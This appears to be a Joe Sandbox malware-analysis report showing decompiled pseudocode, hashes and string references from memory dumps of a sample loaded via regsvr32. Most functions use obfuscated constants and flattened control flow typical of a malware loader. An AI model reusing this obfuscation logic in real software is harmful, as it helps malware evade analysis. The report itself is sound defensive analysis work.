Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #]$$P$Cn$Hc:$R{L$dk
API String ID: 0-1551317889
Opcode ID: 381ff96d10095061f62b73358cae5566e1369e0e8660f2795a771eda3569740b
Instruction ID: ebcd749d1f2e66be7160e80a26975a4fe196ab8f6c25f32adc0192e3c40e7ddf
Opcode Fuzzy Hash: 381ff96d10095061f62b73358cae5566e1369e0e8660f2795a771eda3569740b
Instruction Fuzzy Hash: 11B130B29083419FD358CF26C54941BFBE2FBC4748F008A2DF69996260D3B5DA59CF86

Uniqueness

Uniqueness Score: -1.00%

Function 04B48806, Relevance: 7.7, Strings: 6, Instructions: 201
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E04B48806(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t156;
				void* _t172;
				void* _t174;
				void* _t177;
				void* _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				void* _t189;
				intOrPtr _t216;
				signed int* _t219;

				_t215 = _a8;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04B4FE29(_t156);
				_v76 = 0x923182;
				_t219 =  &(( &_v140)[4]);
				_v72 = 0xa31cb9;
				_t216 = 0;
				_v68 = 0;
				_v64 = 0;
				_t189 = 0xe0c62fa;
				_v120 = 0x4473bb;
				_t183 = 0x46;
				_v120 = _v120 / _t183;
				_v120 = _v120 << 6;
				_v120 = _v120 ^ 0x003879f9;
				_v100 = 0x40bbdb;
				_t184 = 0x64;
				_v100 = _v100 * 0x13;
				_v100 = _v100 ^ 0x04c6e1a5;
				_v140 = 0x8d0a20;
				_v140 = _v140 * 0x6a;
				_v140 = _v140 + 0x25b5;
				_v140 = _v140 * 0x47;
				_v140 = _v140 ^ 0x32607187;
				_v84 = 0x381a9b;
				_v84 = _v84 + 0xbdad;
				_v84 = _v84 ^ 0x00352eaa;
				_v124 = 0x2aec69;
				_v124 = _v124 | 0x10e7a47b;
				_v124 = _v124 ^ 0x113e433b;
				_v124 = _v124 / _t184;
				_v124 = _v124 ^ 0x000f1a56;
				_v80 = 0x7d6845;
				_v80 = _v80 + 0xffff13df;
				_v80 = _v80 ^ 0x0079135d;
				_v92 = 0x295f3e;
				_v92 = _v92 + 0xbf8d;
				_v92 = _v92 ^ 0x0026878e;
				_v116 = 0x37f4f;
				_v116 = _v116 << 6;
				_v116 = _v116 + 0x3a5c;
				_v116 = _v116 ^ 0x00effc52;
				_v132 = 0xa2ba8e;
				_v132 = _v132 + 0x1d0a;
				_v132 = _v132 | 0x3462f83d;
				_t185 = 0x33;
				_v132 = _v132 * 0x30;
				_v132 = _v132 ^ 0xea8b61c3;
				_v128 = 0xc1a215;
				_v128 = _v128 / _t185;
				_v128 = _v128 | 0x8f52208d;
				_v128 = _v128 + 0x2564;
				_v128 = _v128 ^ 0x8f53844f;
				_v108 = 0x49ebcc;
				_v108 = _v108 * 0x2a;
				_v108 = _v108 ^ 0x0c2cea59;
				_v136 = 0x4a157a;
				_t186 = 0x59;
				_v136 = _v136 / _t186;
				_v136 = _v136 >> 1;
				_v136 = _v136 << 9;
				_v136 = _v136 ^ 0x00dde8e3;
				_v96 = 0x85f352;
				_v96 = _v96 | 0xf8883f30;
				_v96 = _v96 ^ 0xf88ae245;
				_v104 = 0xc8529d;
				_v104 = _v104 >> 8;
				_v104 = _v104 ^ 0x00006ec5;
				_v88 = 0xa01b;
				_v88 = _v88 + 0xf4b;
				_v88 = _v88 ^ 0x0002d8bd;
				_v112 = 0x376510;
				_v112 = _v112 >> 1;
				_v112 = _v112 + 0x6895;
				_v112 = _v112 ^ 0x001ca4c8;
				do {
					while(_t189 != 0x2d570bf) {
						if(_t189 == 0x2e69388) {
							_t174 = L04B52BF0(_v80,  &_v60, _v92, _v116, _t215 + 0xc);
							_t219 =  &(_t219[3]);
							__eflags = _t174;
							if(__eflags != 0) {
								_t189 = 0xed0c1fc;
								continue;
							}
						} else {
							if(_t189 == 0xa1356c9) {
								_t177 = L04B52BF0(_v140,  &_v60, _v84, _v124, _t215 + 0x48);
								_t219 =  &(_t219[3]);
								__eflags = _t177;
								if(__eflags != 0) {
									_t189 = 0x2e69388;
									continue;
								}
							} else {
								if(_t189 == 0xd5f0997) {
									__eflags = E04B49D3E( &_v60, _v88, __eflags, _v112, _t215);
									_t216 =  !=  ? 1 : _t216;
								} else {
									if(_t189 == 0xe0c62fa) {
										_t189 = 0xe1d6fcd;
										continue;
									} else {
										if(_t189 == 0xe1d6fcd) {
											L04B322A6(_a4, _v120,  &_v60, _v100);
											_t219 =  &(_t219[2]);
											_t189 = 0xa1356c9;
											continue;
										} else {
											if(_t189 != 0xed0c1fc) {
												goto L19;
											} else {
												_t182 = L04B52BF0(_v132,  &_v60, _v128, _v108, _t215 + 0x1c);
												_t219 =  &(_t219[3]);
												if(_t182 != 0) {
													_t189 = 0x2d570bf;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L22:
						return _t216;
					}
					_t172 = L04B52BF0(_v136,  &_v60, _v96, _v104, _t215 + 0x3c);
					_t219 =  &(_t219[3]);
					__eflags = _t172;
					if(__eflags == 0) {
						_t189 = 0x63acd9;
						goto L19;
					} else {
						_t189 = 0xd5f0997;
						continue;
					}
					goto L22;
					L19:
					__eflags = _t189 - 0x63acd9;
				} while (__eflags != 0);
				goto L22;
			}

0x04b48810
0x04b48817
0x04b48818
0x04b4881f
0x04b48820
0x04b48821
0x04b48826
0x04b4882e
0x04b48831
0x04b48839
0x04b4883b
0x04b48841
0x04b48845
0x04b4884a
0x04b48858
0x04b4885d
0x04b48863
0x04b48868
0x04b48870
0x04b4887d
0x04b48880
0x04b48884
0x04b4888c
0x04b48899
0x04b4889d
0x04b488aa
0x04b488ae
0x04b488b6
0x04b488be
0x04b488c6
0x04b488ce
0x04b488d6
0x04b488de
0x04b488ee
0x04b488f2
0x04b488fa
0x04b48902
0x04b4890a
0x04b48912
0x04b4891a
0x04b48922
0x04b4892a
0x04b48932
0x04b48937
0x04b4893f
0x04b48947
0x04b4894f
0x04b48957
0x04b48964
0x04b48965
0x04b48969
0x04b48971
0x04b4897f
0x04b48983
0x04b4898b
0x04b48993
0x04b4899b
0x04b489a8
0x04b489ac
0x04b489b4
0x04b489c4
0x04b489d1
0x04b489d5
0x04b489d9
0x04b489de
0x04b489e6
0x04b489ee
0x04b489f6
0x04b489fe
0x04b48a06
0x04b48a0b
0x04b48a13
0x04b48a1b
0x04b48a23
0x04b48a2b
0x04b48a33
0x04b48a37
0x04b48a3f
0x04b48a47
0x04b48a47
0x04b48a51
0x04b48b22
0x04b48b27
0x04b48b2a
0x04b48b2c
0x04b48b2e
0x00000000
0x04b48b2e
0x04b48a57
0x04b48a5d
0x04b48af7
0x04b48afc
0x04b48aff
0x04b48b01
0x04b48b07
0x00000000
0x04b48b07
0x04b48a63
0x04b48a69
0x04b48b8c
0x04b48b8e
0x04b48a6f
0x04b48a75
0x04b48ad9
0x00000000
0x04b48a77
0x04b48a7d
0x04b48ac7
0x04b48acc
0x04b48acf
0x00000000
0x04b48a7f
0x04b48a85
0x00000000
0x04b48a8b
0x04b48a9f
0x04b48aa4
0x04b48aa9
0x04b48aaf
0x00000000
0x04b48aaf
0x04b48aa9
0x04b48a85
0x04b48a7d
0x04b48a75
0x04b48a69
0x04b48a5d
0x04b48b92
0x04b48b9d
0x04b48b9d
0x04b48b4c
0x04b48b51
0x04b48b54
0x04b48b56
0x04b48b62
0x00000000
0x04b48b58
0x04b48b58
0x00000000
0x04b48b58
0x00000000
0x04b48b67
0x04b48b67
0x04b48b67
0x00000000

Strings

Eh}, xrefs: 04B488FA
>_), xrefs: 04B48912
i*, xrefs: 04B488CE
d%, xrefs: 04B4898B
$P, xrefs: 04B4880E
\:, xrefs: 04B48937

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$>_)$Eh}$\:$d%$i*
API String ID: 0-2969320698
Opcode ID: aeffe686daea30544195ed0138f6e4945c8625af026a6e1ad50bc3102dfd4890
Instruction ID: 94e6b3194f26ca49c7f4392553abe5582db53cbc8e77685af79a5e2a31828d42
Opcode Fuzzy Hash: aeffe686daea30544195ed0138f6e4945c8625af026a6e1ad50bc3102dfd4890
Instruction Fuzzy Hash: B69154B51083419FD718CE21D58592BBBE1EFC4708F00895DF59A962A0D3B5EA0ADF83

Uniqueness

Uniqueness Score: -1.00%

Function 04B3BFBE, Relevance: 7.6, Strings: 6, Instructions: 149
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E04B3BFBE(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* __ecx;
				void* _t131;
				signed int _t135;
				signed int _t139;
				void* _t143;
				void* _t146;
				void* _t157;
				signed int _t158;
				signed int _t159;
				void* _t161;
				signed int* _t163;

				_t144 = _a4;
				_push(_a8);
				_t161 = __edx;
				_push(_a4);
				_push(__edx);
				E04B4FE29(_t131);
				_v56 = 0x2e7fee;
				_t163 =  &(( &_v68)[4]);
				_v56 = _v56 | 0x8bf0d90c;
				_v56 = _v56 + 0xffff841c;
				_t157 = 0;
				_v56 = _v56 ^ 0x8bfe8408;
				_t146 = 0xe8f06a4;
				_v20 = 0xd3cae8;
				_v20 = _v20 + 0xffff2712;
				_v20 = _v20 ^ 0x00d2f1ea;
				_v16 = 0xd3a0fd;
				_t158 = 0x75;
				_v16 = _v16 / _t158;
				_v16 = _v16 ^ 0x4001cf0d;
				_v40 = 0x4f1d62;
				_v40 = _v40 + 0xffffc4cc;
				_v40 = _v40 + 0xffffbca6;
				_v40 = _v40 ^ 0x004e2d6a;
				_v8 = 0x24ed33;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0x1279d784;
				_v12 = 0xe170a7;
				_t135 = _v12;
				_t159 = 0x28;
				_t155 = _t135 % _t159;
				_v12 = _t135 / _t159;
				_v12 = _v12 ^ 0x0006bc2e;
				_v44 = 0x4d8c8f;
				_v44 = _v44 | 0xffeffd4f;
				_v44 = _v44 ^ 0xffe079b2;
				_v48 = 0xc3edaa;
				_v48 = _v48 >> 0x10;
				_v48 = _v48 + 0xd49e;
				_v48 = _v48 ^ 0x0004c7fe;
				_v68 = 0x67444f;
				_v68 = _v68 + 0x90d;
				_v68 = _v68 * 0x5b;
				_v68 = _v68 | 0x263824b0;
				_v68 = _v68 ^ 0x26bf9150;
				_v52 = 0xb09b3a;
				_v52 = _v52 ^ 0xfa5715e4;
				_v52 = _v52 ^ 0xfae78c15;
				_v24 = 0xeb1207;
				_v24 = _v24 + 0xffffe226;
				_v24 = _v24 ^ 0x00e7632f;
				_v28 = 0x3b6554;
				_v28 = _v28 ^ 0x4e84398c;
				_v28 = _v28 ^ 0x4eb32e0d;
				_v60 = 0x36daca;
				_v60 = _v60 ^ 0xae85a6ca;
				_v60 = _v60 ^ 0x532e6d02;
				_v60 = _v60 ^ 0xfd946988;
				_v64 = 0xe9416a;
				_v64 = _v64 >> 0xc;
				_v64 = _v64 >> 1;
				_v64 = _v64 ^ 0x000bb9db;
				_v32 = 0xb764c3;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0xd93a5796;
				_v4 = 0xb5f3f2;
				_v4 = _v4 ^ 0xf880d4e7;
				_v4 = _v4 ^ 0xf834d19c;
				_t160 = _v4;
				_v36 = 0x2d4acf;
				_v36 = _v36 | 0x966edff9;
				_v36 = _v36 ^ 0x966c13d3;
				do {
					while(_t146 != 0x2926179) {
						if(_t146 == 0x8f0c602) {
							E04B51538(_v4, _v36, _t160);
						} else {
							if(_t146 == 0xb296bf4) {
								_t143 = E04B4C41A(_v24, _t155, _v28,  *_t144, _v60, _t160, _t144 + 4, _v64, _v32,  *((intOrPtr*)(_t144 + 4)));
								_t163 =  &(_t163[8]);
								_t157 = _t143;
								_t146 = 0x8f0c602;
								continue;
							} else {
								if(_t146 != 0xe8f06a4) {
									goto L10;
								} else {
									_t146 = 0x2926179;
									continue;
								}
							}
						}
						L13:
						return _t157;
					}
					_t155 = _v40;
					_t139 = E04B545CA(_t161, _v40, _t146, _t146, _v8, _v12, _v44, _v16, _v48, _v68, _v20, _v52, _v56, 0);
					_t160 = _t139;
					_t163 =  &(_t163[0xc]);
					if(_t139 == 0xffffffff) {
						_t146 = 0xe2d92d;
						goto L10;
					} else {
						_t146 = 0xb296bf4;
						continue;
					}
					goto L13;
					L10:
				} while (_t146 != 0xe2d92d);
				goto L13;
			}

0x04b3bfc2
0x04b3bfc9
0x04b3bfcd
0x04b3bfcf
0x04b3bfd0
0x04b3bfd2
0x04b3bfd7
0x04b3bfdf
0x04b3bfe2
0x04b3bfec
0x04b3bff4
0x04b3bff6
0x04b3bffe
0x04b3c003
0x04b3c00b
0x04b3c013
0x04b3c01b
0x04b3c029
0x04b3c02e
0x04b3c034
0x04b3c03c
0x04b3c044
0x04b3c04c
0x04b3c054
0x04b3c05c
0x04b3c064
0x04b3c069
0x04b3c071
0x04b3c079
0x04b3c07d
0x04b3c07e
0x04b3c080
0x04b3c084
0x04b3c08c
0x04b3c094
0x04b3c09c
0x04b3c0a4
0x04b3c0ac
0x04b3c0b1
0x04b3c0b9
0x04b3c0c1
0x04b3c0c9
0x04b3c0d6
0x04b3c0da
0x04b3c0e2
0x04b3c0ea
0x04b3c0fa
0x04b3c102
0x04b3c10a
0x04b3c112
0x04b3c11a
0x04b3c122
0x04b3c12a
0x04b3c132
0x04b3c13a
0x04b3c142
0x04b3c14a
0x04b3c152
0x04b3c15a
0x04b3c162
0x04b3c167
0x04b3c16b
0x04b3c173
0x04b3c17b
0x04b3c180
0x04b3c188
0x04b3c190
0x04b3c198
0x04b3c1a0
0x04b3c1a4
0x04b3c1ac
0x04b3c1b4
0x04b3c1bc
0x04b3c1bc
0x04b3c1ca
0x04b3c27c
0x04b3c1d0
0x04b3c1d6
0x04b3c208
0x04b3c20d
0x04b3c210
0x04b3c212
0x00000000
0x04b3c1d8
0x04b3c1de
0x00000000
0x04b3c1e4
0x04b3c1e4
0x00000000
0x04b3c1e4
0x04b3c1de
0x04b3c1d6
0x04b3c282
0x04b3c28b
0x04b3c28b
0x04b3c23f
0x04b3c247
0x04b3c24c
0x04b3c24e
0x04b3c254
0x04b3c260
0x00000000
0x04b3c256
0x04b3c256
0x00000000
0x04b3c256
0x00000000
0x04b3c265
0x04b3c265
0x00000000

Strings

/c, xrefs: 04B3C11A
3$, xrefs: 04B3C05C
ODg, xrefs: 04B3C0C1
Te;, xrefs: 04B3C122
jA, xrefs: 04B3C15A
j-N, xrefs: 04B3C054

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: /c$3$$ODg$Te;$j-N$jA
API String ID: 0-1439100758
Opcode ID: 6beecac5511420f763a8f2b06641e78c47f08b7496e3c8d03a53748897a012dd
Instruction ID: 2a8cde2a6ebe4f6a3e8a468ea350d76a34e26909e0fa9e30e505386558b4499c
Opcode Fuzzy Hash: 6beecac5511420f763a8f2b06641e78c47f08b7496e3c8d03a53748897a012dd
Instruction Fuzzy Hash: 806144720183409FC798CFA5D88A81BBFF1FBC5718F405A1DF6D696260C3B59A198B92

Uniqueness

Uniqueness Score: -1.00%

Function 100167D5, Relevance: 7.6, APIs: 5, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E100167D5(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x10057a08; // 0x7d1a16f8
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x1005afc0 = _t6;
				 *0x1005afbc = _t22;
				 *0x1005afb8 = _t25;
				 *0x1005afb4 = _t21;
				 *0x1005afb0 = _t27;
				 *0x1005afac = _t26;
				 *0x1005afd8 = ss;
				 *0x1005afcc = cs;
				 *0x1005afa8 = ds;
				 *0x1005afa4 = es;
				 *0x1005afa0 = fs;
				 *0x1005af9c = gs;
				asm("pushfd");
				_pop( *0x1005afd0);
				 *0x1005afc4 =  *_t31;
				 *0x1005afc8 = _v0;
				 *0x1005afd4 =  &_a4;
				 *0x1005af10 = 0x10001;
				_t11 =  *0x1005afc8; // 0x0
				 *0x1005aec4 = _t11;
				 *0x1005aeb8 = 0xc0000409;
				 *0x1005aebc = 1;
				_t12 =  *0x10057a08; // 0x7d1a16f8
				_v812 = _t12;
				_t13 =  *0x10057a0c; // 0x82e5e907
				_v808 = _t13;
				 *0x1005af08 = IsDebuggerPresent();
				_push(1);
				E100227FB(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x1002b434);
				if( *0x1005af08 == 0) {
					_push(1);
					E100227FB(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x100167d5
0x100167d5
0x100167d5
0x100167d5
0x100167d5
0x100167d5
0x100167d5
0x100167db
0x100167dd
0x100167dd
0x1001c395
0x1001c39a
0x1001c3a0
0x1001c3a6
0x1001c3ac
0x1001c3b2
0x1001c3b8
0x1001c3bf
0x1001c3c6
0x1001c3cd
0x1001c3d4
0x1001c3db
0x1001c3e2
0x1001c3e3
0x1001c3ec
0x1001c3f4
0x1001c3fc
0x1001c407
0x1001c411
0x1001c416
0x1001c41b
0x1001c425
0x1001c42f
0x1001c434
0x1001c43a
0x1001c43f
0x1001c44b
0x1001c450
0x1001c452
0x1001c45a
0x1001c465
0x1001c472
0x1001c474
0x1001c476
0x1001c47b
0x1001c48f

APIs

IsDebuggerPresent.KERNEL32 ref: 1001C445
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001C45A
UnhandledExceptionFilter.KERNEL32(1002B434), ref: 1001C465
GetCurrentProcess.KERNEL32(C0000409), ref: 1001C481
TerminateProcess.KERNEL32(00000000), ref: 1001C488

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 7284fa7d50281a3c049889d49720807c61de6750ecda71a27977002e3826e049
Instruction ID: 29b7c1aed7e77d05a339182a33a9266dca5d513d51f4b37265af4c9016ee4a47
Opcode Fuzzy Hash: 7284fa7d50281a3c049889d49720807c61de6750ecda71a27977002e3826e049
Instruction Fuzzy Hash: 0021B0B4408328DFE701DFA9EDC96487BB0FB0A315F50406AE508873A1E7B459C2CF55

Uniqueness

Uniqueness Score: -1.00%

Function 04B52009, Relevance: 6.5, Strings: 5, Instructions: 275
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E04B52009() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				unsigned int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				unsigned int _v1176;
				signed int _v1180;
				signed int _v1184;
				void* _t310;
				intOrPtr _t312;
				void* _t315;
				void* _t319;
				void* _t320;
				intOrPtr _t321;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				intOrPtr _t333;
				intOrPtr _t340;
				void* _t364;
				signed int* _t368;

				_t368 =  &_v1184;
				_v1044 = _v1044 & 0x00000000;
				_v1052 = 0x35c0cd;
				_v1048 = 0xa3be33;
				_v1136 = 0x5ade05;
				_v1136 = _v1136 + 0xffffc499;
				_v1136 = _v1136 >> 0xf;
				_v1136 = _v1136 ^ 0x000b842c;
				_v1180 = 0x412a9d;
				_t326 = 0x29;
				_v1180 = _v1180 / _t326;
				_v1180 = _v1180 << 0xb;
				_t364 = 0xe958b9c;
				_v1180 = _v1180 + 0xffff9519;
				_v1180 = _v1180 ^ 0x0cbc23a5;
				_v1156 = 0xd33cfc;
				_v1156 = _v1156 + 0xffff4a87;
				_v1156 = _v1156 ^ 0xbe5aeb75;
				_t327 = 0xb;
				_v1156 = _v1156 * 0x62;
				_v1156 = _v1156 ^ 0xf0302705;
				_v1148 = 0xf18826;
				_v1148 = _v1148 << 1;
				_v1148 = _v1148 >> 0xa;
				_v1148 = _v1148 + 0xffff44eb;
				_v1148 = _v1148 ^ 0xfffe3e21;
				_v1112 = 0x4e0c4f;
				_v1112 = _v1112 + 0x7be6;
				_v1112 = _v1112 ^ 0x004f5571;
				_v1128 = 0xa7ca39;
				_v1128 = _v1128 + 0xffffebca;
				_v1128 = _v1128 / _t327;
				_v1128 = _v1128 ^ 0x000be641;
				_v1176 = 0xb5e613;
				_v1176 = _v1176 << 0xb;
				_v1176 = _v1176 << 0xb;
				_v1176 = _v1176 >> 3;
				_v1176 = _v1176 ^ 0x109d8d71;
				_v1100 = 0x8f570;
				_v1100 = _v1100 << 6;
				_v1100 = _v1100 ^ 0x02300751;
				_v1184 = 0x7a4582;
				_v1184 = _v1184 >> 0xc;
				_v1184 = _v1184 + 0xffff757f;
				_v1184 = _v1184 + 0xcda4;
				_v1184 = _v1184 ^ 0x0000a546;
				_v1140 = 0x8d05f4;
				_v1140 = _v1140 * 3;
				_v1140 = _v1140 | 0x54c49d95;
				_v1140 = _v1140 + 0xffffe0ec;
				_v1140 = _v1140 ^ 0x55e75198;
				_v1108 = 0xd76cc6;
				_v1108 = _v1108 | 0x05cc2328;
				_v1108 = _v1108 ^ 0x05dcca41;
				_v1076 = 0x1bbfa4;
				_v1076 = _v1076 * 0x15;
				_v1076 = _v1076 ^ 0x02435ecc;
				_v1084 = 0x2803a8;
				_v1084 = _v1084 << 0xd;
				_v1084 = _v1084 ^ 0x007964fc;
				_v1092 = 0x1abb48;
				_v1092 = _v1092 ^ 0xd0321100;
				_v1092 = _v1092 ^ 0xd024152f;
				_v1120 = 0x1b785b;
				_v1120 = _v1120 + 0x6594;
				_v1120 = _v1120 ^ 0xc9bc1812;
				_v1120 = _v1120 ^ 0xc9a1a482;
				_v1056 = 0xf96b0d;
				_v1056 = _v1056 | 0x7a81934f;
				_v1056 = _v1056 ^ 0x7af06d17;
				_v1116 = 0xc0176d;
				_t328 = 0x57;
				_v1116 = _v1116 / _t328;
				_v1116 = _v1116 ^ 0x000c7a92;
				_v1144 = 0x386a20;
				_v1144 = _v1144 >> 0xa;
				_t329 = 0x41;
				_v1144 = _v1144 * 0x35;
				_v1144 = _v1144 + 0xffff2f3c;
				_v1144 = _v1144 ^ 0x00015cc7;
				_v1124 = 0xfe7131;
				_v1124 = _v1124 >> 4;
				_v1124 = _v1124 + 0xffffd592;
				_v1124 = _v1124 ^ 0x000ea5e3;
				_v1172 = 0xf233ef;
				_v1172 = _v1172 / _t329;
				_v1172 = _v1172 >> 8;
				_v1172 = _v1172 >> 7;
				_v1172 = _v1172 ^ 0x000dfea7;
				_v1088 = 0xf13b31;
				_v1088 = _v1088 << 4;
				_v1088 = _v1088 ^ 0x0f1b90b2;
				_v1060 = 0x8432f0;
				_v1060 = _v1060 + 0xf898;
				_v1060 = _v1060 ^ 0x00806ced;
				_v1096 = 0x8a20ae;
				_v1096 = _v1096 + 0xffff5c91;
				_v1096 = _v1096 ^ 0x008c8276;
				_v1072 = 0xbc3343;
				_v1072 = _v1072 | 0xeb032685;
				_v1072 = _v1072 ^ 0xebbb8611;
				_v1104 = 0xb5445c;
				_v1104 = _v1104 | 0x38284c17;
				_v1104 = _v1104 ^ 0x38b8f1ba;
				_v1152 = 0x20ddec;
				_t330 = 0x69;
				_v1152 = _v1152 * 0x4d;
				_v1152 = _v1152 >> 1;
				_v1152 = _v1152 << 0xc;
				_v1152 = _v1152 ^ 0x15fd1151;
				_v1132 = 0xda9d4d;
				_v1132 = _v1132 / _t330;
				_v1132 = _v1132 ^ 0x63ba58ef;
				_v1132 = _v1132 ^ 0x63ba5da3;
				_v1080 = 0xcf1222;
				_v1080 = _v1080 | 0x484758e4;
				_v1080 = _v1080 ^ 0x48c184f1;
				_v1064 = 0x309461;
				_v1064 = _v1064 + 0xffffd409;
				_v1064 = _v1064 ^ 0x00392de5;
				_v1164 = 0xd882bd;
				_t331 = 0xc;
				_v1164 = _v1164 / _t331;
				_v1164 = _v1164 + 0x74b;
				_v1164 = _v1164 >> 3;
				_v1164 = _v1164 ^ 0x00039f5a;
				_v1160 = 0x7a48e2;
				_v1160 = _v1160 ^ 0x69cb0a8d;
				_v1160 = _v1160 ^ 0x1624d419;
				_v1160 = _v1160 >> 9;
				_v1160 = _v1160 ^ 0x00301506;
				_v1168 = 0x1f51cb;
				_v1168 = _v1168 ^ 0x7c6813be;
				_v1168 = _v1168 * 0x65;
				_v1168 = _v1168 + 0xffff91bf;
				_v1168 = _v1168 ^ 0x1b097545;
				_v1068 = 0x9ab8d;
				_v1068 = _v1068 + 0x88f0;
				_v1068 = _v1068 ^ 0x000186e4;
				E04B3556B(_t331);
				do {
					while(_t364 != 0x62623fc) {
						if(_t364 == 0x81770e6) {
							return E04B4654A(_v1160, _v1168, __eflags,  &_v520, _v1068,  &_v1040);
						}
						if(_t364 == 0xe065299) {
							_push(_v1124);
							_push(_v1144);
							_push(_v1116);
							_t319 = E04B4E1F8(0x4b31080, _v1056, __eflags);
							_t320 = E04B3DC1B(_v1172);
							_t340 =  *0x4b56214; // 0x0
							_t321 =  *0x4b56214; // 0x0
							E04B544AD(_v1060, __eflags, _v1096,  &_v1040, _t321 + 0x23c, _v1072, _v1104, _t319, _t340 + 0x34, _t320, _v1152);
							_t315 = E04B4FECB(_t319, _v1132, _v1080, _v1064, _v1164);
							_t368 =  &(_t368[0xf]);
							_t364 = 0x81770e6;
							continue;
						}
						if(_t364 != 0xe958b9c) {
							goto L8;
						}
						_t364 = 0x62623fc;
					}
					_push(_v1128);
					_push(_v1112);
					_push(_v1148);
					_t310 = E04B4E1F8(0x4b31000, _v1156, __eflags);
					_t333 =  *0x4b56214; // 0x0
					_t312 =  *0x4b56214; // 0x0
					__eflags = _t312 + 0x23c;
					E04B52D0A(_v1100, _t312 + 0x23c, _t312 + 0x23c, _v1184, _v1140, _v1108, _t333 + 0x34,  &_v520, _t333 + 0x34, _t310);
					_t315 = E04B4FECB(_t310, _v1076, _v1084, _v1092, _v1120);
					_t368 =  &(_t368[0xe]);
					_t364 = 0xe065299;
					L8:
					__eflags = _t364 - 0xc2e12c9;
				} while (__eflags != 0);
				return _t315;
			}

0x04b52009
0x04b5200f
0x04b52019
0x04b52024
0x04b5202f
0x04b52037
0x04b5203f
0x04b52044
0x04b5204c
0x04b5205e
0x04b52063
0x04b52069
0x04b5206e
0x04b52073
0x04b5207b
0x04b52083
0x04b5208b
0x04b52093
